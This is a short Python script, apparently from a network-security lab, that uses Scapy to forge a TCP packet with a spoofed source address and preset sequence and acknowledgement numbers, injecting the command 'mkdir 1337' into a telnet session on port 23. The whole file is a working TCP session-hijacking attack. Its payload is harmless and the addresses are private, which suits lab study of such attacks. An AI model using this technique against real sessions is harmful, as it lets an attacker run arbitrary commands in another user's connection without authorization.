#!/usr/bin/env python3
from scapy.all import IP,TCP,send,ls
ip = IP(src="10.3.0.3", dst="10.3.0.4")
tcp = TCP(sport=54402, dport=23, flags="PA", seq=4125627535, ack=2474120203)
data = "\r mkdir 1337 \r"
pkt = ip/tcp/data
ls(pkt)
send(pkt, verbose=0)
